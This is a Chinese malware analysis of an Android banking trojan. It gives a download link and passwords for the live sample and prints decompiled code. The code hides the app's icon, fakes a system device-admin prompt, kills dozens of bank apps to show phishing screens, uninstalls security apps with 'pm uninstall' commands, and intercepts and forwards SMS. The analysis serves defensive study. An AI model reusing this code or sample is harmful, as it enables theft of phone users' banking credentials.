android病毒“银行悍匪”独家分析
- 时间:2015年04月02日 15:11:14 来源:魔法猪系统重装大师官网 人气:11876
一、 病毒样本基本信息
FileName: b5910a432d2b866e1028f31874edb32f.apk
File MD5: b5910a432d2b866e1028f31874edb32f
SHA1: 0CEEB0A29AC4B24E1EFDD0F57ACFC64388CF5AC1
File Size: 829006 Byte
Package: langthing.nend
Download:http://yunpan.cn/Q4qHuRLaNivtd 访问密码 3a90 解压密码:52pojie
// 该病毒首先申请设备管理器权限并伪装成系统程序,以防止被卸载;然后尝试卸载安全软件;监控各类银行应用的启动;对需要拦截的短信关键字进行了加密,增加了分析难度;没有MAIN和LAUNCHER组件,安装后不显示图标,使用户难以察觉已安装该应用
二、 病毒代码分析
查看AndroidManifest.xml配置文件,可以发现病毒申请了大量权限,其中不少是高危权限,例如发送短信、拨打电话、读取日志文件、重启应用程序等;同时没有声明MAIN和LAUNCHER组件,因此安装后不会出现应用图标
xmlns:android="http://schemas.android.com/apk/res/android"> 查看AndroidManifest.xml配置文件,可以发现当手机接收到TReceiver、eviceAdminReceiver、Alarmreceiver等组件时就会启动程序 receiver android:name=".TReceiver"> 恶意注入代码的代码树如下: 查看langthing.nend.main伪装成系统代码如下: private void b() { Intent localIntent = new Intent("android.app.action.ADD_DEVICE_ADMIN"); localIntent.putExtra("android.app.extra.DEVICE_ADMIN", this.c); localIntent.putExtra("android.app.extra.ADD_EXPLANATION", "------ android ------"); // 伪装成系统应用 startActivityForResult(localIntent, 1); } 当应用监测到银行客户端启动时,就会终止个银行进程,并为工商银行、淘宝等定制了高仿真“钓鱼界面” private void e() { ComponentName localComponentName = ((ActivityManager.RunningTaskInfo)p.getRunningTasks(1).get(0)).topActivity; ActivityManager localActivityManager = (ActivityManager)getSystemService("activity"); String str = localComponentName.getClassName(); if ((str.contains("gs.gs")) || (str.contains("js.js")) || (str.contains("jt.jt")) || (str.contains("tb.tb")) || (str.contains("dz.dz"))) { if (a(getApplicationContext(), "com.icbc")) localActivityManager.restartPackage("com.icbc"); if (a(getApplicationContext(), "com.chinamworld.main")) localActivityManager.restartPackage("com.chinamworld.main"); if (a(getApplicationContext(), "com.bankcomm")) localActivityManager.restartPackage("com.bankcomm"); if (a(getApplicationContext(), "com.taobao.taobao")) localActivityManager.restartPackage("com.taobao.taobao"); if (a(getApplicationContext(), "com.android.bankabc")) localActivityManager.restartPackage("com.android.bankabc"); if (a(getApplicationContext(), "cmb.pb")) localActivityManager.restartPackage("cmb.pb"); if (a(getApplicationContext(), "com.rytong.bankgdb")) localActivityManager.restartPackage("com.rytong.bankgdb"); if (a(getApplicationContext(), "com.cib.bankcib")) localActivityManager.restartPackage("com.cib.bankcib"); if (a(getApplicationContext(), "com.rytong.bankps")) localActivityManager.restartPackage("com.rytong.bankps"); if (a(getApplicationContext(), "cn.com.njcb.android.mobilebank")) 
localActivityManager.restartPackage("cn.com.njcb.android.mobilebank"); if (a(getApplicationContext(), "com.ecitic.bank.mobile")) localActivityManager.restartPackage("com.ecitic.bank.mobile"); if (a(getApplicationContext(), "com.cebbank.bankebb")) localActivityManager.restartPackage("com.cebbank.bankebb"); if (a(getApplicationContext(), "cn.com.cmbc.mbank")) localActivityManager.restartPackage("cn.com.cmbc.mbank"); if (a(getApplicationContext(), "cn.com.spdb.mobilebank.per")) localActivityManager.restartPackage("cn.com.spdb.mobilebank.per"); if (a(getApplicationContext(), "com.pingan.pabank.activity")) localActivityManager.restartPackage("com.pingan.pabank.activity"); if (a(getApplicationContext(), "com.gzrcb.mobilebank")) localActivityManager.restartPackage("com.gzrcb.mobilebank"); if (a(getApplicationContext(), "cn.com.cqb.mobilebank.per")) localActivityManager.restartPackage("cn.com.cqb.mobilebank.per"); if (a(getApplicationContext(), "com.chinamworld.bocmbci")) localActivityManager.restartPackage("com.chinamworld.bocmbci"); if (a(getApplicationContext(), "com.rytong.app.bankhx")) localActivityManager.restartPackage("com.rytong.app.bankhx"); if (a(getApplicationContext(), "com.csii.huzhou.mobilebank")) localActivityManager.restartPackage("com.csii.huzhou.mobilebank"); if (a(getApplicationContext(), "cn.com.shbank.mper")) localActivityManager.restartPackage("cn.com.shbank.mper"); if (a(getApplicationContext(), "com.rytong.bankqd")) localActivityManager.restartPackage("com.rytong.bankqd"); if (a(getApplicationContext(), "com.tlbank")) localActivityManager.restartPackage("com.tlbank"); if (a(getApplicationContext(), "com.sookin.scyh")) localActivityManager.restartPackage("com.sookin.scyh"); if (a(getApplicationContext(), "cn.com.hzb.mobilebank.per")) localActivityManager.restartPackage("cn.com.hzb.mobilebank.per"); if (a(getApplicationContext(), "com.chinamworld.klb")) localActivityManager.restartPackage("com.chinamworld.klb"); } if (str.contains("icbc")) { Cursor 
localCursor27 = c.a("yh", new String[] { "_id", "mc", "jilu" }, "mc=?", new String[] { "gs" }, null, null, null); if ((localCursor27.moveToFirst()) && (localCursor27.getInt(localCursor27.getColumnIndex("jilu")) == 0)) { localActivityManager.restartPackage("com.icbc"); new Intent("android.intent.action.MAIN"); Intent localIntent53 = new Intent("android.intent.action.MAIN"); localIntent53.setFlags(268435456); localIntent53.addCategory("android.intent.category.HOME"); startActivity(localIntent53); Intent localIntent54 = new Intent(getApplicationContext(), gs.class); localIntent54.setFlags(268435456); startActivity(localIntent54); } } if (str.contains("com.chinamworld.main")) { Cursor localCursor26 = c.a("yh", new String[] { "_id", "mc", "jilu" }, "mc=?", new String[] { "js" }, null, null, null); if ((localCursor26.moveToFirst()) && (localCursor26.getInt(localCursor26.getColumnIndex("jilu")) == 0)) { localActivityManager.restartPackage("com.chinamworld.main"); new Intent("android.intent.action.MAIN"); Intent localIntent51 = new Intent("android.intent.action.MAIN"); localIntent51.setFlags(268435456); localIntent51.addCategory("android.intent.category.HOME"); startActivity(localIntent51); Intent localIntent52 = new Intent(getApplicationContext(), js.class); localIntent52.setFlags(268435456); startActivity(localIntent52); } } if (str.contains("bankcomm")) { Cursor localCursor25 = c.a("yh", new String[] { "_id", "mc", "jilu" }, "mc=?", new String[] { "jt" }, null, null, null); if ((localCursor25.moveToFirst()) && (localCursor25.getInt(localCursor25.getColumnIndex("jilu")) == 0)) { localActivityManager.restartPackage("com.bankcomm"); new Intent("android.intent.action.MAIN"); Intent localIntent49 = new Intent("android.intent.action.MAIN"); localIntent49.setFlags(268435456); localIntent49.addCategory("android.intent.category.HOME"); startActivity(localIntent49); Intent localIntent50 = new Intent(getApplicationContext(), jt.class); localIntent50.setFlags(268435456); 
startActivity(localIntent50); } } if (str.contains("taobao")) { Cursor localCursor24 = c.a("yh", new String[] { "_id", "mc", "jilu" }, "mc=?", new String[] { "tb" }, null, null, null); if ((localCursor24.moveToFirst()) && (localCursor24.getInt(localCursor24.getColumnIndex("jilu")) == 0)) { localActivityManager.restartPackage("com.taobao.taobao"); new Intent("android.intent.action.MAIN"); Intent localIntent47 = new Intent("android.intent.action.MAIN"); localIntent47.setFlags(268435456); localIntent47.addCategory("android.intent.category.HOME"); startActivity(localIntent47); Intent localIntent48 = new Intent(getApplicationContext(), tb.class); localIntent48.setFlags(268435456); startActivity(localIntent48); } // 终止各银行进程 查找安全软件并卸载安全软件 for (g = "Already root"; ; g = "NOroot") { this.C = 5; this.E = 5; this.B = new String[this.C]; this.D = new String[this.E]; this.B[0] = "pm uninstall com.qihoo360.mobilesafe"; //卸载360、腾讯、金山等相关的安全软件 this.B[1] = "pm uninstall com.tencent.qqpimsecure"; this.B[2] = "pm uninstall com.ijinshan.mguard"; this.B[3] = "pm uninstall com.ijinshan.duba"; this.B[4] = "pm uninstall com.anguanjia.safe"; this.D[0] = "com.qihoo360.mobilesafe"; this.D[1] = "com.tencent.qqpimsecure"; this.D[2] = "com.ijinshan.mguard"; this.D[3] = "com.ijinshan.duba"; this.D[4] = "com.anguanjia.safe"; this.s = new o(); 拦截相关短信: f (i5 == 1) if ((server.f == 0) && (server.a != i3)) { server.a(this.a, 1); server.b(this.a, i3); str4 = "接收"; server.a(this.a, new o()); String str5 = server.d(this.a).a(this.a.getApplicationContext()); server.a(this.a, new n()); server.g(this.a).a(this.a.getApplicationContext(), str2, str1, str5); localStringBuilder.append("[ "); localStringBuilder.append(str1 + ", "); localStringBuilder.append(i4 + ", "); localStringBuilder.append(str2 + ", "); localStringBuilder.append(str3 + ", "); localStringBuilder.append(str4); localStringBuilder.append(" ]\n\n"); if (!localCursor1.isClosed()) localCursor1.close(); } } while (true) { 
localStringBuilder.append("getSmsInPhone has executed!"); super.onChange(paramBoolean); return; server.f = 0; break; if (i5 != 2) break; if (server.b == i3) break label760; Cursor localCursor2 = server.c.a("send", null, null, null, null, null, "_id ASC"); if (localCursor2.moveToFirst()) { localCursor2.getColumnIndex("_id"); int i6 = localCursor2.getColumnIndex("sSend"); do server.a(this.a, localCursor2.getString(i6)); while (localCursor2.moveToNext()); } localCursor2.close(); if (server.h(this.a).equals("1")) { server.a(this.a, new o()); server.a(this.a, new n()); String str6 = server.d(this.a).a(this.a.getApplicationContext()); server.a(this.a, str2 + ";" + str1, str6); } server.b = i3; str4 = "发送"; break; localStringBuilder.append("no result!"); } } catch (SQLiteException localSQLiteException) { while (true) { continue; label760: String str4 = "null"; } } } } 解密密钥: public void a() { try { InputStream localInputStream = getAssets().open("unhi.db"); // 密钥 FileOutputStream localFileOutputStream = new FileOutputStream(this.q + "unhi.db"); byte[] arrayOfByte = new byte[1024]; while (true) { int i1 = localInputStream.read(arrayOfByte); if (i1 <= 0) { localFileOutputStream.flush(); localFileOutputStream.close(); localInputStream.close(); return; } localFileOutputStream.write(arrayOfByte, 0, i1); } } catch (Exception localException) { } } public void a(String paramString) { if (!new File(paramString).exists()) a(); } public void c() { new l(this).start(); } public IBinder onBind(Intent paramIntent) { return null; } public void onCreate() { this.u = new e(); IntentFilter localIntentFilter = new IntentFilter("android.provider.Telephony.SMS_RECEIVED"); localIntentFilter.setPriority(2147483647); registerReceiver(this.u, localIntentFilter); p = (ActivityManager)getSystemService("activity"); this.F = 0; this.j = false; b(this.s.a(getApplicationContext()), "201305:" + g + ";ver:" + Build.VERSION.RELEASE + ";Model:" + Build.MODEL); this.q = 
(getApplicationContext().getFilesDir().getAbsolutePath() + "/"); a(this.q + "unhi.db"); c = new a(this, getApplicationContext().getFilesDir().getAbsolutePath() + "/unhi.db", null, 1); m localm = new m(this, new Handler()); getContentResolver().registerContentObserver(Uri.parse("content://sms/"), true, localm); Intent localIntent = new Intent(getApplicationContext(), log.class); localIntent.setFlags(268435456); startService(localIntent); 三、 总结 该病毒尝试着去卸载安全软件;采用了加密技术,增加了分析难度;并隐藏运行界面,防止用户察觉。可以看出移动安全问题越演越烈,且手段越来越高明,增加了分析难度。 // 由于本人对于密码学方面还没有Hello World的水平,所以无法解密相关信息,水平有限。
程序安装后,会通过申请设备管理器权限伪装成系统程序,防止用户卸载。如图: